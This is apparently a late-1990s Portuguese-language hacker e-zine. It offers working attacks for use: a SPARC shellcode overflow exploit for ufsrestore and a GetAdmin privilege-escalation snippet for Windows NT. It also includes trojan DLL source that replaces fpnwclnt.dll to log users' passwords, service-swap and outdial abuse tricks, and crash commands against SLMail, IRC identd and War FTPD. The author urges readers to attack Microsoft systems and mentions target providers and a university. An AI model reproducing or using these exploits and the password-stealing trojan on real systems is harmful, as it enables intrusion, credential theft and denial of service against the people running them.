«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«» * Versão: 2.6 - SLMail * Descrição: Belo CRASH * Exploit: telnet host.com.br 25 vrfy «»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«»«» * Versão: 2.x * Descrição: ufsrestore * Exploit: -----------------------------------ufs_bug.c--------------------------------- #include #include #include #include #define BUF_LENGTH 300 #define EXTRA 100 #define STACK_OFFSET -600 #define SPARC_NOP 0xac15a16e u_char sparc_shellcode[] = "\x90\x08\x3f\xff\x82\x10\x20\x8d\x91\xd0\x20\x08" "\x90\x08\x3f\xff\x82\x10\x20\x17\x91\xd0\x20\x08" "\x2d\x0b\xd8\x9a\xac\x15\xa1\x6e" "\xae\x10\x2b\xdc\xaf\x2d\xe0\x01\xae\x05\xe0\x01" "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" "\xaf\x2d\xe0\x01\xae\x05\xe0\x01\xaf\x2d\xe0\x01" "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x01" "\xae\x05\xe0\x01\xaf\x2d\xe0\x01\xaf\x2d\xe0\x0a" "\x90\x0b\x80\x0e" "\x92\x03\xa0\x08\x94\x1a\x80\x0a\x9c\x03\xa0\x10\xec\x3b\xbf\xf0" "\xdc\x23\xbf\xf8\xc0\x23\xbf\xfc\x82\x10\x20\x3b\x91\xd0\x20\x08" "\x90\x1b\xc0\x0f\x82\x10\x20\x01\x91\xd0\x20\x08"; u_long get_sp(void) { __asm__("mov %sp,%i0 \n"); } void main(int argc, char *argv[]) { char buf[BUF_LENGTH + EXTRA + 8]; long targ_addr; u_long *long_p; u_char *char_p; int i, code_length = strlen(sparc_shellcode),dso=0,a=0; if(argc > 1) dso=atoi(argv[1]); long_p =(u_long *) buf ; targ_addr = get_sp() - STACK_OFFSET - dso; for (i = 0; i < (BUF_LENGTH - code_length) / sizeof(u_long); i++) *long_p++ = SPARC_NOP; char_p = (u_char *) long_p; for (i = 0; i < code_length; i++) *char_p++ = sparc_shellcode[i]; long_p = (u_long *) char_p; for (i = 0; i < EXTRA / sizeof(u_long); i++) *long_p++ =targ_addr; printf("Jumping to address 0x%lx B[%d] E[%d] SO[%d]\n", targ_addr,BUF_LENGTH,EXTRA,STACK_OFFSET); printf("hit ctrl-c and then type y\n"); execl("/usr/lib/fs/ufs/ufsrestore", &buf[4],"if", "-",(char *) 0); perror("execl failed"); } -------------------------------------EOF------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Atenção!!! O novo editor da zine, Simon Phoenix, não quiz q seu e-mail fosse publicado. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 8. Crackerz $$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Lista de hexadecimais compilada por Cheat Struck (parte 3) Você ainda vai precisar! Hexa: Comando: 00C0 ADD AL,AL 00C1 ADD CL,AL 00C2 ADD DL,AL 00C3 ADD BL,AL 00C4 ADD AH,AL 00C5 ADD CH,AL 00C6 ADD DH,AL 00C7 ADD BH,AL 00C8 ADD AL,CL 00C9 ADD CL,CL 00CA ADD DL,CL 00CB ADD BL,CL 00CC ADD AH,CL 00CD ADD CH,CL 00CE ADD DH,CL 00CF ADD BH,CL 00D0 ADD AL,DL 00D1 ADD CL,DL 00D2 ADD DL,DL 00D3 ADD BL,DL 00D4 ADD AH,DL 00D5 ADD CH,DL 00D6 ADD DH,DL 00D7 ADD BH,DL 00D8 ADD AL,BL 00D9 ADD CL,BL 00DA ADD DL,BL 00DB ADD BL,BL 00DC ADD AH,BL 00DD ADD CH,BL 00DE ADD DH,BL 00DF ADD BH,BL 00E0 ADD AL,AH 00E1 ADD CL,AH 00E2 ADD DL,AH 00E3 ADD BL,AH 00E4 ADD AH,AH 00E5 ADD CH,AH 00E6 ADD DH,AH 00E7 ADD BH,AH 00E8 ADD AL,CH 00E9 ADD CL,CH 00EA ADD DL,CH 00EB ADD BL,CH 00EC ADD AH,CH 00ED ADD CH,CH 00EE ADD DH,CH 00EF ADD BH,CH 00F0 ADD AL,DH 00F1 ADD CL,DH 00F2 ADD DL,DH 00F3 ADD BL,DH 00F4 ADD AH,DH 00F5 ADD CH,DH 00F6 ADD DH,DH 00F7 ADD BH,DH 00F8 ADD AL,BH 00F9 ADD CL,BH 00FA ADD DL,BH 00FB ADD BL,BH 00FC ADD AH,BH 00FD ADD CH,BH 00FE ADD DH,BH 00FF ADD BH,BH 01C0 ADD AX,AX 01C1 ADD CX,AX 01C2 ADD DX,AX 01C3 ADD BX,AX 01C8 ADD AX,CX 01C9 ADD CX,CX 01CA ADD DX,CX 01CB ADD BX,CX 01D0 ADD AX,DX 01D1 ADD CX,DX 01D2 ADD DX,DX 01D3 ADD BX,DX 01D8 ADD AX,BX 01D9 ADD CX,BX 01DA ADD DX,BX 01DB ADD BX,BX 04** ADD AL,** 05$$** ADD AX,**$$ 80C1** ADD CL,** 80C3** ADD BL,** 80C2** ADD DL,** 80C4** ADD AH,** 80C5** ADD CH,** 80C6** ADD DH,** 80C7** ADD BH,** 81C1$$** ADD CX,**$$ 81C2$$** ADD DX,**$$ 81C3$$** ADD BX,**$$ 83C1** ADD CX,+** 83C2** ADD DX,+** 83C3** ADD BX,+** -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Fim da parte 3 -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$ $$$$$$$ $$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$ $$$$$$ 9. Invasão de privacidade $#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$ $$$$$$$ $$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Invadindo Windows NT -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Pelo servidor WIN O windows NT possui o mesmo bug do win95 no serviço WIN. Uma vez con- figurado é possivel mapear qquer sistema Windows que esteja com a opção de impressora/arquivos e pastas livres para usuários da rede. Este truque está disposto na maioria das pages "hackers"(entre aspas pq só existem textos tipo esse e invasão por FTP) onde está melhor explicado. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Pelo serviço Pack3 Este serviço possue um bug que posibilita q qquer usuário use qquer conta do sistema, até a do root, desde que se saiba o login. Aqui está o exploit. ----------------------------Corte Aki-(GetAdmin)----------------------------- Function ChangeNtGlobalFlag : BOOL ChangeNtGlobalFlag(DWORD pNtGlobalFlag) { DWORD callnumber = 0x3; //NtAddAtom DWORD stack[32] ; int i; DWORD handle=0; CHAR string[255]; if(!pNtGlobalFlag) return 0; stack[0] = (DWORD)string; stack[1] = (DWORD)&handle; //pNtGlobalFlag; for(i=0;i ? 0x100;i++) { sprintf(string,"NT now cracking... pass %d",i); if(handle & 0xf00){ stack[1] = (DWORD)pNtGlobalFlag+1; } __asm{ mov eax, callnumber; mov edx, stack; lea edx,dword ptr [stack]; int 0x2e; } if( stack[1] == pNtGlobalFlag+1) break; } return TRUE; } ----------------------------------------------------------------------------- Use-o da seguinte maneira: GetAdmin -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Usando o programa de horario. Ao conectar com um servidor WinNT ele lhe dará um horário pelo pro- grama atsvc.exe. Este programa sempre é rodado, por tanto oque devesse fazer é renomea-lo para qquer coisa e copiar o %systemroot%\system32\musrmgr.exe no seu lugar, e renomea-lo para atsvc.exe. Com isso vc entrará no grupo dos Administradores. Seja bem vindo!!! -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Executando programas sem privilegios. Moleza!! Renomeie o programa para qquer coisa .txt . Ae vai no prompt do DOS e execute-o com o comando start. Assim: start programa.txt =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--==-=-= Cavalos de Troya. Existe um registro (lembrando q os registros do Windows estaum no pro- grama "REGEDIT.EXE") de uma DLL no WinNT conectado a rede, que na verdade es- conde uma senha de acesso ao grupo dos roots. Achamos o lugar perfeito para um trojam. O arquivo DLL. O arquivo eh %SYSTEMROOT%\System32\fpnwclnt.dll . Compile a fonte do trojam e substitua esse arquivo pelo trojam. Depois de feito eh soh esperar ateh a senha seja uzada novamente entaum olhe o arquivo %SYSTEMROOT%\temp\pwdchange.out ----------------------------Corte Aki--(fpnwclnt.c)-------------------------- #include #include #include struct UNI_STRING { USHORT len; USHORT maxlen; WCHAR *buff; }; static HANDLE fh; BOOLEAN __stdcall InitializeChangeNotify () { DWORD wrote; fh = CreateFile("C:\\temp\\pwdchange.out", GENERIC_WRITE, FILE_SHARE_READ|FILE_SHARE_WRITE, 0, CREATE_ALWAYS, FILE_ATTRIBUTE_NORMAL|FILE_FLAG_WRITE_THROUGH, 0); WriteFile(fh, "InitializeChangeNotify started\n", 31, &wrote, 0); return TRUE; } LONG __stdcall PasswordChangeNotify ( struct UNI_STRING *user, ULONG rid, struct UNI_STRING *passwd ) { DWORD wrote; WCHAR wbuf[200]; char buf[512]; char buf1[200]; DWORD len; memcpy(wbuf, user->buff, user->len); len = user->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "User = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); memcpy(wbuf, passwd->buff, passwd->len); len = passwd->len/sizeof(WCHAR); wbuf[len] = 0; wcstombs(buf1, wbuf, 199); sprintf(buf, "Password = %s : ", buf1); WriteFile(fh, buf, strlen(buf), &wrote, 0); sprintf(buf, "RID = %x\n", rid); WriteFile(fh, buf, strlen(buf), &wrote, 0); return 0L; } ----------------------------------------------------------------------------- -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==--=-==-=-=-=-=-=-==-=-=-=- Bem.. Por hoje eh soh pessoal!! Se gostaram desta materia mandem mails que eu terei prazer em publicar mais dicas como estas. Vamos phuder com a Microsoft e seus sistemas. Se tiverm alguma duvida, tb mail-me pois eu acho que naum me dirigi muito ao pessoal begginer nesta materia. $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$ 10. Hack, the Art $$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$ $$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Forçando um Outdial Vejamos assim. Você quer ligar para akela BBS lah dos Estados Unidos, mas aí pensa no tamanho da conta telefonica. Então vc liga para a rede que possui um outdial e dela liga para a BBS. Resultado: A conta gigante irá para rede com OD e vc só pagará uma chamadinha local de nada. Mas achar um outdial atualmete é dificil pra BURRO. Por isso se vc conseguir encontrar alguma, guarde-a para vc. Não começe a espalhar. A inicio parece dificil e é mesmo. Mas se vc conhecer alguma rede ad- ministrada por um panaca(akele da escola q se acha o expert), fica + fácil. Primeiro vc tem q se conectar a essa rede e verificar se o programa de terminal está com permisão para ser executado. Se não tiver, vc terá que hackear a rede(fácil se o administrador for lamah). Uma vez com permisão para todos, é só utiliza-lo para discar prum No qquer só pra testar. ATDP 2224443 . Funcionou?? Blza!! Agora disque pra Deus e o mundo! Nota!!: A rede precisa ter no minimo 2 linhas livres(não usadas). Uma boa tb é ligar para akele seu amigo que akabou de contruir uma BBZ com 10 linhas e ainda te pediu ajuda para configura-la. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=--=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= Bloqueando um servidor de IRC É um nuke novo e muita pouca gente o conhece. Além de ser fácil. Ele utilizará um bug no identd do mIRC5.3 e bloqueará o servidor. Para detecta-lo de um /whois e se aparecer um ~ no UserID, vc achooo. Apenas de uns 6 telnet no host pela porta 113, após isso o host será bloqueado. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- Bloqueando um servidor que usa WinNT Naum bastou a materia do Invasao de privacidade mostrando varias falhas gravissimas nesse sistemasinho. Eh muito mole.. De um telnet pela porta 21(ftp). Logo ap¢s conectar-se digite os seguintes comandos: USER xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx PASS xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx Essa eh uma das principais falhas de seguranca do War FTPD nos WIN 95 e NT. Soo much Cool!!! $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#$$$$$$$$#$$#$##$$#$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$#####$$$#$$$#$#$#$#$#####$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#$$$$$$$$$#$$#$$$$#$#$$##$#$$$$$$$$$$$$$$$$ $$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$$#####$#####$#####$#$#$$$#$#####$$$$$$$$$$$$ Okz.. Nessa edicao eu falei muito sobre o WinNT e suas falhas, mas eh que eu jah encontrei uns 2 provedores de acesso a internet daqui do sul que usam este sistema e tb pq a faculdade do meu irmao usa essa merda. Nas proximas edicoes acho que vou falar um pouco mais de SunOS. Continuem escrevendo mails.. Pois soh assim eu vou saber se a zine tah agradando ou eh soh mais uma entre outras. Mail : cszine@hotmail.com